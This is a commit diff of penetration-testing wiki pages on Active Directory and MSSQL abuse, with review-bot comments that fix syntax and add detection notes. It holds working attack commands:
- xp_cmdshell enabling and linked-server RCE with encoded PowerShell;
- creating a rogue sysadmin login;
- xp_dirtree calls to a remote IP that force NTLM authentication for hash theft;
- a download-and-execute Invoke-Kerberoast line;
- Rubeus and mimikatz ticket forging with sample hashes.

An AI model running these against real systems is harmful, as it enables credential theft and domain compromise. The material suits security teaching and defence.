GitBook: [#3389] No subject

This commit is contained in:
CPol 2022-08-15 13:00:19 +00:00 committed by gitbook-bot
parent 47bedbff68
commit b340d48881
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
10 changed files with 209 additions and 81 deletions

View file

@ -167,7 +167,7 @@
* [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md)
* [Kerberos Authentication](windows-hardening/active-directory-methodology/kerberos-authentication.md)
* [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md)
* [MSSQL Trusted Links](windows-hardening/active-directory-methodology/mssql-trusted-links.md)
* [MSSQL AD Abuse](windows-hardening/active-directory-methodology/abusing-ad-mssql.md)
* [Over Pass the Hash/Pass the Key](windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md)
* [Pass the Ticket](windows-hardening/active-directory-methodology/pass-the-ticket.md)
* [Password Spraying](windows-hardening/active-directory-methodology/password-spraying.md)
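Review bot: the SUMMARY entry now links abusing-ad-mssql.md and the mssql-trusted-links.md entry is gone, but nothing in this commit shows the old file being removed or redirected, so any external bookmark or in-book cross-reference still using mssql-trusted-links.md will break. The two in-page references updated elsewhere in this commit confirm the rename is intentional; add a redirect for the old path (or keep a stub page pointing at the new one) so the old URL keeps resolving.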

View file

@ -16,20 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="warning" %}
**Support HackTricks and get benefits!**
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover **The PEASS Family**, our collection of exclusive **NFTs**
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
{% endhint %}
## Basic Information
**Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational\_database\_management\_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database\_server), it is a [software product](https://en.wikipedia.org/wiki/Software\_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software\_application)—which may run either on the same computer or on another computer across a network (including the Internet).\
@ -116,6 +102,9 @@ crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
#Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
#this turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
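Review bot: the added lines `# Check if xp_cmdshell is enabled` and `#this turns on advanced options ...` use shell-style `#` comments next to T-SQL statements, and `sp_configure 'show advanced options', '1'` passes the value as a string where the rest of the page uses the integer `1`. If these lines are meant to be pasted into a SQL session, use `--` comments and `sp_configure 'show advanced options', 1`. Also worth saying that `SELECT * FROM sys.configurations` returns both `value` and `value_in_use`; `value_in_use` is the column that reflects whether xp_cmdshell is actually active after `RECONFIGURE`, and it is the one a monitoring baseline should compare against.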
@ -142,7 +131,7 @@ msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
### Abusing MSSQL trusted Links
[**Read this post**](../windows-hardening/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature**
[**Read this post**](../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature**
### **Read files executing scripts (Python and R)**

View file

@ -204,12 +204,12 @@ This attack aims to **use the user NTLM hash to request Kerberos tickets**, as a
This attack is similar to Pass the Key, but instead of using hashes to request a ticket, the **ticket itself is stolen** and used to authenticate as its owner.\
[**More information about Pass the Ticket here**](pass-the-ticket.md)**.**
### MSSQL Trusted Links
### MSSQL Abuse & Trusted Links
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA).\
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA), **steal** the NetNTLM **hash** or even perform a **relay** **attack**.\
Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. These trusts can be chained and at some point the user might be able to find a misconfigured database where he can execute commands.\
**The links between databases work even across forest trusts.**\
[**More information about this technique here.**](mssql-trusted-links.md)
[**More information about this technique here.**](abusing-ad-mssql.md)
### Unconstrained Delegation
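Review bot: the rewritten first sentence under "MSSQL Abuse & Trusted Links" still reads "he could be able to use it"; suggest "may be able to use it". The next sentence, "Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, ...", is a fragment followed by a second conditional; merge them: "Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance and the user has privileges over the trusted database, they will be able to use the trust relationship ...". Both problems predate this commit, but the paragraph is being edited here anyway.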

View file

@ -1,4 +1,4 @@
# MSSQL Trusted Links
# MSSQL AD Abuse
<details>
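Review bot: the H1 changes from "MSSQL Trusted Links" to "MSSQL AD Abuse", but this hunk shows only content edits, not a file rename, while the SUMMARY entry added in this commit points at abusing-ad-mssql.md. Confirm the file itself was moved to that path; if it still lives at mssql-trusted-links.md the new sidebar link will not resolve.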
@ -16,19 +16,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## MSSQL Trusted Links
## **MSSQL Enumeration / Discovery**
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA).\
Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands.
The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case.
**The links between databases work even across forest trusts.**
### **Powershell**
```bash
```powershell
Import-Module .\PowerupSQL.psd1
```
#Get local MSSQL instance (if any)
### Enumerating from the network without domain session
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
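Review bot: the new "Enumerating from the network without domain session" section opens with `Get-SQLInstanceLocal`, which only lists instances installed on the host you are running on and has nothing to do with network position, and the same two lines are repeated verbatim under "Enumerating from inside the domain" later in this file. Keep the local-instance commands once, in their own short section, and leave the two network/domain sections for the UDP scan and the SPN-based discovery they actually describe. The fence fix from ```bash to ```powershell is correct.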
@ -39,8 +38,15 @@ Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP Verbose Threads
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
```
### Enumerating from inside the domain
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
# FROM INSIDE OF THE DOMAIN
#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
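Review bot: the hunk header's context line `Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP Verbose Threads` is missing the parameter dashes and a thread count (`-Verbose -Threads 10`, for example) and will not run as written. Two smaller points in the added lines: `Get-SQLConnectionTest -Username test -Password test` should use the `<username>`/`<password>` placeholders the rest of the page uses so nobody reads `test` as a meaningful default, and "This looks for SPNs that starts with MSSQL" should read "start with".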
@ -51,9 +57,71 @@ Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```
## MSSQL Basic Abuse
### Access DB
```powershell
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
```
### MSSQL xp\_dirtree abuse
Executing something such as `EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1` will make the MSSQL server to **login** to the specified **IP address**.
### Steal NetNTLM hash / Relay attack
Using **`xp_dirtree`** it's possible to **force** a NTLM **authentication**, therefore it's possible to **steal** the NetNTLM **hash** or even perform a **relay attack**.
Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash**.\
You can see how to use these tools in:
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
{% endcontent-ref %}
### MSSQL RCE
It might be also possible to **execute commands** inside the MSSQL host
```powershell
Invoke-SQLOSCmd -Instance "srv-1.dev.cyberbotic.io,1433" -Command "whoami" -RawResults
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
```
If **manually** you could just use:&#x20;
<pre class="language-sql"><code class="lang-sql"><strong>#To enumerate the current state of xp_cmdshell
</strong>SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# A value of 0 shows that xp_cmdshell is disabled. To enable it:
sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# Execute
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'powershell -w hidden -enc &#x3C;blah>';</code></pre>
### MSSQL Extra
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md" %}
[pentesting-mssql-microsoft-sql-server.md](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md)
{% endcontent-ref %}
## MSSQL Trusted Links
If a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands.
**The links between databases work even across forest trusts.**
### Powershell Abuse
```powershell
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
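Review bot: the `<pre class="language-sql">` block under "MSSQL RCE" puts `#` comments (`#To enumerate the current state of xp_cmdshell`, `# Execute`) inside T-SQL, which SQL Server rejects as a syntax error if the block is pasted as-is; use `--` comments, and prefer a fenced ```sql block over the raw HTML with `<strong>` spans and the `&#x3C;blah>` entity, which is a GitBook export artifact and unreadable in source. Typos in this hunk: "a lotof CVSs" should be "a lot of CSVs", "checks if xp_cmdshell is enable" should be "enabled", and "This trusts can be chained" should be "These trusts". Since the section now documents flipping `xp_cmdshell` on, it would also be worth one line saying where that shows up: `sp_configure`/`RECONFIGURE` changes are written to the SQL Server error log, and `value_in_use` in `sys.configurations` is the column to alert on, which is what makes this step detectable.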
@ -90,35 +158,51 @@ Notice that metasploit will try to abuse only the `openquery()` function in MSSQ
### Manual - Openquery()
From Linux you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py** and run queries like:
From **Linux** you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py.**
```bash
select * from openquery("DOMINIO\SERVER1",'select * from openquery("DOMINIO\SERVER2",''select * from master..sysservers'')')
```
From Windows you could also find the links and execute commands manually using a MSSQL client like [HeidiSQL](https://www.heidisql.com)
From **Windows** you could also find the links and execute commands manually using a **MSSQL client like** [**HeidiSQL**](https://www.heidisql.com)****
_Login using Windows authentication:_
![](<../../.gitbook/assets/image (167) (1).png>)
_Find links inside the accessible MSSQL server (in this case the link is to dcorp-sql1):_\
\_\_`select * from master..sysservers`
#### Find Trustable Links
```sql
select * from master..sysservers
```
![](<../../.gitbook/assets/image (168).png>)
Execute queries through the link (example: find more links in the new accessible instance):\
`select * from openquery("dcorp-sql1", 'select * from master..sysservers')`
#### Execute queries in trustable link
Execute queries through the link (example: find more links in the new accessible instance):
```sql
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
```
{% hint style="warning" %}
Check where double and single quotes are used, it's important to use them that way.
{% endhint %}
![](<../../.gitbook/assets/image (169).png>)
You can continue these trusted links chain forever manually.
Some times you won't be able to perform actions like `exec xp_cmdshell` from `openquery()` in those cases it might be worth it to test the following method:
```sql
# First level RCE
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
```
If you cannot perform actions like `exec xp_cmdshell` from `openquery()` try with the `EXECUTE` method.
### Manual - EXECUTE
You can also abuse trusted links using EXECUTE:
You can also abuse trusted links using `EXECUTE`:
```bash
#Create user and give admin privileges
@ -126,6 +210,14 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '')
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
## Local Privilege Escalation
The **MSSQL local user** usually has a special type of privilege called **`SeImpersonatePrivilege`**. This allows the account to "impersonate a client after authentication".
A strategy that many authors have come up with is to force a SYSTEM service to authenticate to a rogue or man-in-the-middle service that the attacker creates. This rogue service is then able to impersonate the SYSTEM service whilst it's trying to authenticate.
[SweetPotato](https://github.com/CCob/SweetPotato) has a collection of these various techniques which can be executed via Beacon's `execute-assembly` command.
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
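Review bot: three fences in this region carry the wrong language tag: the `openquery(...)` one-liner under "Manual - Openquery()" and the `EXECUTE(...)` block under "Manual - EXECUTE" are tagged ```bash but contain T-SQL, and the "First level RCE" block is tagged ```sql but uses `#` comments, which T-SQL does not accept (use `--`). Dropping the line `\_\_\`select * from master..sysservers\`` is right, it was an escaping artifact. In the EXECUTE example, `CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123.'` should be marked as a placeholder name and password, and it is fair to note that creating a login and calling `sp_addsrvrolemember` on the linked server are exactly the server-level changes the SQL Server default trace records, so this path is noisy from the defender's side. Finally, the new "Local Privilege Escalation" section describes the `SeImpersonatePrivilege` idea in two sentences but ties it to MSSQL only through the first one; a half-sentence saying the service account is what gives you that privilege in the first place would make the link explicit.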

View file

@ -50,11 +50,15 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc
{% code title="Using Windows" %}
```bash
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
```
{% endcode %}
{% hint style="warning" %}
AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0.
{% endhint %}
### Cracking
```
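Review bot: the new hint "AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0" should say what those values mean so it works as a detection note: 0x17 is RC4-HMAC (Rubeus asks for it so the resulting hash cracks faster) and pre-authentication type 0 means no pre-auth was performed, and that combination on an account with "Do not require Kerberos preauthentication" set is the signature defenders filter 4768 events on. The added `.\Rubeus.exe asreproast ... [/user:username]` line duplicates the line above it; keeping one line with the optional switch in brackets is enough.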

View file

@ -1,4 +1,4 @@
# Constrained Delegation
<details>
@ -16,54 +16,88 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## Constrained Delegation
# Constrained Delegation
Using this a Domain admin can **allow** a computer to **impersonate a user or computer** against a **service** of a machine.
Using this a Domain admin can allow 3rd parties to impersonate a user or computer against a service of a machine.
* **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), then it can obtains a TGS for itself (the service) on behalf of any other user.
* **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), then it can obtain a TGS for itself (the service) on behalf of any other user.
* **Service for User to Proxy(**_**S4U2proxy**_**):** A **service account** could obtain a TGS on behalf any user to the service set in **msDS-AllowedToDelegateTo.** To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one.
**Note**: If a user is marked as _Account is sensitive and cannot be delegated_ in AD, you will **not be able to impersonate** them.
This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** (possible **privesc**).\
Also, you **won't only have access to the service that user is able to impersonate, but also to any service that uses the same account as the allowed one** (because the SPN is not being checked, only privileges). For example, if you have access to **CIFS service** you can also have access to **HOST service**.\
Moreover, notice that if you have access to **LDAP service on DC**, you will have enough privileges to exploit a **DCSync**.
This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** (possible **privesc**).
{% code title="Enumerate from Powerview" %}
Moreover, you **won't only have access to the service that the user is able to impersonate, but also to any service** because the SPN (the service name requested) is not being checked, only privileges. Therefore, if you have access to **CIFS service** you can also have access to **HOST service** using `/altservice` flag in Rubeus.
Also, **LDAP service access on DC**, is what is needed to exploit a **DCSync**.
{% code title="Enumerate" %}
```bash
# Powerview
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json
```
{% endcode %}
{% code title="Using kekeo.exe + Mimikatz.exe" %}
```bash
#Obtain a TGT for the Constained allowed user
<pre class="language-bash" data-title="Get TGT"><code class="lang-bash"># The first step is to get a TGT of the service taht can impersonate others
## If you are SYSTEM in the server, you might take it from memory
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
# If you are SYSTEM, you might get the AES key or the RC4 hash from memory and request one
## Get AES/RC4 with mimikatz
mimikatz sekurlsa::ekeys
## Request with aes
<strong>tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
</strong>.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap
# Request with RC4
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
#Load the TGS in memory
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
```
{% endcode %}
.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi</code></pre>
{% hint style="warning" %}
There are **other ways to obtain a TGT ticket** or the **RC4** or **AES256** without being SYSTEM in the computer like the Printer Bug and unconstrain delegation, NTLM relaying and Active Directory Certificate Service abuse
**Just having that TGT ticket (or hashed) you can perform this attack without compromising the whole computer.**
{% endhint %}
{% code title="Using Rubeus" %}
```bash
#Obtain a TGT for the Constained allowed user
.\Rubeus.exe asktgt /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
#Obtain a TGS of the Administrator user to self
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator
#Obtain service TGS impersonating Administrator (CIFS)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS
#Impersonate Administrator on different service (HOST)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST
# Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2)
\.Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap
#Load ticket in memory
.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
```
{% endcode %}
## Mitigation
{% code title="kekeo + Mimikatz" %}
```bash
#Obtain a TGT for the Constained allowed user
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
#Load the TGS in memory
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
```
{% endcode %}
### Mitigation
* Disable kerberos delegation where possible
* Limit DA/Admin logins to specific services
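Review bot: this hunk promotes "## Constrained Delegation" to "# Constrained Delegation" while the file already opens with "# Constrained Delegation" (first hunk in this file), so the page ends up with two H1s; keep the body heading at H2. The new "Get TGT" block is a `<pre class="language-bash" data-title="Get TGT">` with `<strong>` spans instead of the `{% code %}` fence the rest of the page uses; it also has the typo "taht" in its first comment. Other problems in the added or moved lines: `\.Rubeus.exe s4u /impersonateuser:...` should be `.\Rubeus.exe`; the realm in the kekeo `tgs::s4u` line contains a space (`@DOLLAR CORP.MONEYCORP.LOCAL`) and the `kerberos::ptt` ticket name has one after `ldap~`, so neither would be accepted as written; "unconstrain delegation" in the hint should be "unconstrained delegation"; and "it first need a TGS" in the S4U2proxy bullet should be "needs". Since the hint now lists ways to obtain the service's TGT without SYSTEM, the Mitigation list below would benefit from naming the control that blocks the impersonation itself, which the page already mentions: marking privileged accounts "Account is sensitive and cannot be delegated" (or placing them in Protected Users).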
@ -71,7 +105,6 @@ Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.
[**More information in ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -87,5 +120,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View file

@ -1,4 +1,4 @@
# Kerberoast
<details>
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# Kerberoast
## Kerberoast
The goal of **Kerberoasting** is to harvest **TGS tickets for services that run on behalf of user accounts** in the AD, not computer accounts. Thus, **part** of these TGS **tickets are** **encrypted** with **keys** derived from user passwords. As a consequence, their credentials could be **cracked offline**.\
You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**.
@ -50,14 +49,24 @@ Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current f
{% code title="From Windows" %}
```bash
# Powerview
Request-SPNTicket -SPN "<SPN>" #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user
# Invoke-Kerberoast
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
```
{% endcode %}
## Cracking
{% hint style="warning" %}
When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.
{% endhint %}
### Cracking
```
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
@ -65,7 +74,7 @@ hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
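Review bot: the new hint "When a TGS is requested, Windows event 4769 - A Kerberos service ticket was requested is generated" is true of every service ticket request, so by itself it is not a Kerberoast indicator. To make it useful, state what distinguishes roasting, which the ired.team link at the bottom of this page already covers: 4769 events with ticket encryption type 0x17 (RC4) for user-account SPNs in a domain that supports AES, and a single client requesting tickets for many SPNs in a short window. The added `iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/...")` line executes whatever is on that branch at run time; pin a commit or say that it runs unreviewed remote code. The Cracking fence that follows is still untagged.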
## Persistence
### Persistence
If you have **enough permissions** over a user you can **make it kerberoastable**:
@ -77,7 +86,7 @@ You can find useful **tools** for **kerberoast** attacks here: [https://github.c
If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC: `ntpdate <IP of DC>`
## Mitigation
### Mitigation
Kerberoast is very stealthy if exploitable
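Review bot: the hunk header's context line "it because of your local time, you need to synchronise the host with the DC" should read "it is because of your local time; synchronise the host with the DC". Only the heading level changes here, but the line is part of the visible context and easy to fix in the same edit.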
@ -98,7 +107,6 @@ Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{
**More information about Kerberoasting in ired.team in** [**here** ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)**and** [**here**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)**.**
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -114,5 +122,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View file

@ -81,6 +81,12 @@ If you are already inside the Windows machine you can force Windows to connect t
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
```
### MSSQL
```sql
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
```
## HTML injection
### Via email
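Review bot: the new MSSQL entry hard-codes `10.10.17.231` while the `MpCmdRun.exe` line just above uses `<YOUR IP>`; use the same placeholder. A one-line explanation of the arguments would help too: the first `1` is the recursion depth and the second is the "include files" flag. From the defensive side it is worth noting that `xp_dirtree` is executable by the public role by default, which is why any login can trigger this outbound SMB authentication, and revoking EXECUTE on it from public (plus blocking outbound SMB from the SQL host) is the corresponding mitigation.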

View file

@ -237,7 +237,7 @@ IconIndex=1337
We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.
```
```powershell
Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
currentFolder = shl.CurrentDirectory
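Review bot: the fence on this block is retagged ```powershell, but the code (`Set shl = CreateObject("WScript.Shell")`, `Set fso = CreateObject("Scripting.FileSystemObject")`) is VBScript, so the tag should be `vbscript` (or `vb`); the block further down that starts with `$objShell = New-Object -ComObject WScript.Shell` is the actual PowerShell version and its retag is correct. The context sentence "as you as you open the shortcut" has a duplicated "as you".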
@ -254,7 +254,7 @@ sc.Save
The Powershell version.
```
```powershell
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
